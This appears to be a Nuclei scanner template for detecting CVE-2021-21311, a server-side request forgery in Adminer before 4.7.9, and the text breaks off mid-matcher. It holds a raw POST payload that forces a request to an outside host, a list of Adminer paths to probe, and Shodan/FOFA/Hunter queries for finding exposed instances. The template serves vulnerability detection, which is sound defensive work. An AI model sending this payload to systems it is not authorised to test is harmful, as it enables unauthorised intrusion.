id: CVE-2021-21311 info: name: Adminer <4.7.9 - Server-Side Request Forgery author: Adam Crosser,pwnhxl severity: high description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: Upgrade to version 4.7.9 or later. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - https://packagist.org/packages/vrana/adminer - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 epss-score: 0.01052 epss-percentile: 0.82417 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 vendor: adminer product: adminer shodan-query: title:"Login - Adminer" fofa-query: app="Adminer" && body="4.7.8" hunter-query: app.name="Adminer"&&web.body="4.7.8" tags: cve,cve2021,adminer,ssrf http: - raw: - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}} payloads: path: - "/index.php" - "/adminer.php" - "/adminer/adminer.php" - "/adminer/index.php" - "/_adminer.php" - "/_adminer/index.php" attack: batteringram stop-at-first-match: true cookie-reuse: true redirects: true max-redirects: 1 matchers-condition: and matchers: - type: word part: body words: - "